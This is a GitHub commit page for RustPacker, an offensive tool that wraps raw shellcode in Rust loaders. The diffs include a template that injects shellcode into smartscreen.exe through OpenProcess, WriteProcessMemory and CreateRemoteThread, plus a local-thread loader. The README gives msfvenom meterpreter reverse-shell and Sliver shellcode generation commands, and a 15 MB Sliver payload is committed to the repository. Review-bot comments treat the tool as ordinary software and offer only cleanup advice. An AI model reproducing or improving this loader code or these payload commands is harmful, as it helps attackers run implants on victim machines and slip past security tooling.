
Commit 3782e1d

authored
Merge pull request #2 from Nariod/dev
Dev
2 parents 567411f + 86de5ba commit 3782e1d


7 files changed

+48
-21
lines changed


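--- a/Cargo.toml
+++ b/Cargo.toml
@@ -10,4 +10,5 @@ clap = "3.2.22"
 random-string = "1.0.0"
 cargo = "0.65.0"
 path-absolutize = "3.0.13"
-fs_extra = "1.2.0"
+fs_extra = "1.2.0"
+path-clean = "0.1.0"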
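Review bot: `path-absolutize = "3.0.13"` remains in the dependency list while the `absolute_path` helper added to src/puzzle.rs in this same commit is built on the new `path-clean` crate; if no remaining code uses path-absolutize (not visible from this section), drop that line so the crate does not carry an unused dependency. Two crates pulled in for one job is also where a stale, unaudited version tends to linger unnoticed.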

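--- a/README.md
+++ b/README.md
@@ -50,13 +50,18 @@ RustPacker is compatible with any "raw" shellcode.
 You can generate raw MSF shellcode using msfvenom's raw format. Ex:
 - `msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=80 -f raw -o msf.bin`
 
+### Sliver
+You can generate raw [Sliver](https://github.com/BishopFox/sliver) shellcode using Sliver's "--format shellcode". Ex:
+- `generate --mtls 127.0.0.1:443 --format shellcode --windows`
+- Do not use Shikata Ga Nai (SGN) Sliver encoder if prompted. RustPacker templates do not use RWX memory regions, which are required for SGN to work.
+
 ## Todo
 - [X] Port createThread Rust template
 - [X] Port createRemoteThread Rust template
 - [X] Debug binary file to Vec<u8>
 - [X] Debug compiler -> Done, FFS !
 - [X] Packer POC
-- [ ] Migrate to "std::include_bytes"
+- [X] Migrate to "std::include_bytes"
 - [ ] Add encryption / encoding
 - [X] Build dockerfile
 - [X] Strip output binaries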

shared/sliver.bin

15 MB
Binary file not shown.
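Review bot: shared/sliver.bin is a 15 MB generated payload checked into the repository, under the directory that src/puzzle.rs uses as its output root (`general_output_folder.push("shared")`). A blob like this cannot be reviewed, will trip endpoint scanners for anyone who clones the repo, and stays in git history even after it is later deleted. Keep build outputs and sample payloads out of version control — add `shared/` (or at least `*.bin`) to .gitignore — and let users supply their own input file at run time.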

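--- a/src/main.rs
+++ b/src/main.rs
@@ -7,7 +7,7 @@ mod shellcode_reader;
 
 fn main() {
 let order = arg_parser::meta_arg_parser();
-let shellcode = shellcode_reader::meta_shellcode_reader(&order.shellcode_path);
-let mut output_folder = puzzle::meta_puzzle(order, shellcode);
+//let shellcode = shellcode_reader::meta_shellcode_reader(&order.shellcode_path);
+let mut output_folder = puzzle::meta_puzzle(order);
 compiler::meta_compiler(&mut output_folder);
 }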
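Review bot: The old call is left behind as a comment (`//let shellcode = shellcode_reader::meta_shellcode_reader(&order.shellcode_path);`) instead of being deleted, and `mod shellcode_reader;` in the hunk header is still declared. Remove the commented line, and if nothing else in the crate uses `shellcode_reader` (not visible from this hunk), drop the `mod` declaration too so the module does not linger as dead code. Version control already preserves the old call should it ever be needed again.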

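--- a/src/puzzle.rs
+++ b/src/puzzle.rs
@@ -7,6 +7,22 @@ use std::io::prelude::*;
 use std::path::Path;
 use std::path::PathBuf;
 use std::str;
+use std::env;
+use std::io;
+use path_clean::PathClean;
+
+pub fn absolute_path(path: impl AsRef<Path>) -> io::Result<PathBuf> {
+// thanks to https://stackoverflow.com/questions/30511331/getting-the-absolute-path-from-a-pathbuf
+let path = path.as_ref();
+
+let absolute_path = if path.is_absolute() {
+path.to_path_buf()
+} else {
+env::current_dir()?.join(path)
+}.clean();
+
+Ok(absolute_path)
+}
 
 fn search_and_replace(
 path_to_main: &Path,
@@ -51,7 +67,7 @@ fn copy_template(source: &Path, dest: &Path) -> Result<(), Box<dyn std::error::E
 Ok(())
 }
 
-pub fn meta_puzzle(order: Order, shellcode: Vec<u8>) -> PathBuf {
+pub fn meta_puzzle(order: Order) -> PathBuf {
 println!("[+] Assembling Rust code..");
 let mut general_output_folder = PathBuf::new();
 general_output_folder.push("shared");
@@ -60,8 +76,12 @@ pub fn meta_puzzle(order: Order, shellcode: Vec<u8>) -> PathBuf {
 Execution::CreateThread => Path::new("templates/createThread/."),
 Execution::CreateRemoteThread => Path::new("templates/createRemoteThread/."),
 };
-let search = "{{shellcode}}";
-let replace: String = format!("{:?}", &shellcode);
+let search = "{{PATH_TO_SHELLCODE}}";
+let absolute_shellcode_path = match absolute_path(order.shellcode_path) {
+Ok(path) => path,
+Err(err) => panic!("{:?}", err),
+};
+let replace: String = format!("{:?}", &absolute_shellcode_path);
 
 let folder: PathBuf = match create_root_folder(&general_output_folder) {
 Ok(content) => content,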
Ok(content) => content,

templates/createRemoteThread/src/main.rs

Lines changed: 12 additions & 11 deletions
@@ -6,6 +6,7 @@ use windows::Win32::System::Memory::{MEM_COMMIT, PAGE_EXECUTE_READ, PAGE_READWRI
66
use windows::Win32::System::Threading::CreateRemoteThread;
77
use windows::Win32::System::Threading::OpenProcess;
88
use windows::Win32::System::Threading::PROCESS_ALL_ACCESS;
9+
use std::include_bytes;
910

1011
fn boxboxbox(tar: &str) -> Vec<u32> {
1112
// search for processes to inject into
@@ -22,29 +23,29 @@ fn enhance(buf: &[u8], tar: &u32) {
2223
// injecting in target processes :)
2324

2425
unsafe {
25-
let hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, *tar).unwrap();
26-
let resultPtr = VirtualAllocEx(hProcess, None, buf.len(), MEM_COMMIT, PAGE_READWRITE);
26+
let h_process = OpenProcess(PROCESS_ALL_ACCESS, false, *tar).unwrap();
27+
let result_ptr = VirtualAllocEx(h_process, None, buf.len(), MEM_COMMIT, PAGE_READWRITE);
2728
let mut byteswritten = 0;
2829
let _resb = WriteProcessMemory(
29-
hProcess,
30-
resultPtr,
30+
h_process,
31+
result_ptr,
3132
buf.as_ptr() as _,
3233
buf.len(),
3334
Some(&mut byteswritten),
3435
);
3536
let mut old_perms = PAGE_EXECUTE_READ;
3637
let _bool = VirtualProtectEx(
37-
hProcess,
38-
resultPtr,
38+
h_process,
39+
result_ptr,
3940
buf.len(),
4041
PAGE_EXECUTE_READ,
4142
&mut old_perms,
4243
);
43-
let _resCRT = CreateRemoteThread(
44-
hProcess,
44+
let _res_crt = CreateRemoteThread(
45+
h_process,
4546
None,
4647
0,
47-
Some(std::mem::transmute(resultPtr)),
48+
Some(std::mem::transmute(result_ptr)),
4849
None,
4950
0,
5051
None,
@@ -57,13 +58,13 @@ fn main() {
5758
// inject in the following processes:
5859
let tar: &str = "smartscreen.exe";
5960

60-
let buf: Vec<u8> = vec!{{shellcode}};
61+
let buf = include_bytes!({{PATH_TO_SHELLCODE}});
6162
let list: Vec<u32> = boxboxbox(tar);
6263
if list.len() == 0 {
6364
panic!("[-] Unable to find a process.")
6465
} else {
6566
for i in &list {
66-
enhance(&buf, i);
67+
enhance(buf, i);
6768
}
6869
}
6970
}
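Review bot: `use std::include_bytes;` on the new line 9 is unnecessary — `include_bytes!` is part of the standard prelude and needs no import — so the added line can be dropped; the identical import added in templates/createThread/src/main.rs can go for the same reason. Leaving it is harmless, but it reads as if the macro were otherwise out of scope.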

templates/createThread/src/main.rs

Lines changed: 3 additions & 3 deletions
@@ -5,7 +5,7 @@ use windows::Win32::System::Memory::{MEM_COMMIT, PAGE_EXECUTE_READ, PAGE_READWRI
55
use windows::Win32::System::Threading::CreateThread;
66
use windows::Win32::System::Threading::WaitForSingleObject;
77
use windows::Win32::System::Threading::THREAD_CREATION_FLAGS;
8-
8+
use std::include_bytes;
99

1010

1111
fn enhance(buf: &[u8]) {
@@ -28,6 +28,6 @@ fn enhance(buf: &[u8]) {
2828
}
2929
}
3030
fn main() {
31-
let buf: Vec<u8> = vec!{{shellcode}};
32-
enhance(&buf);
31+
let buf = include_bytes!({{PATH_TO_SHELLCODE}});
32+
enhance(buf);
3333
}
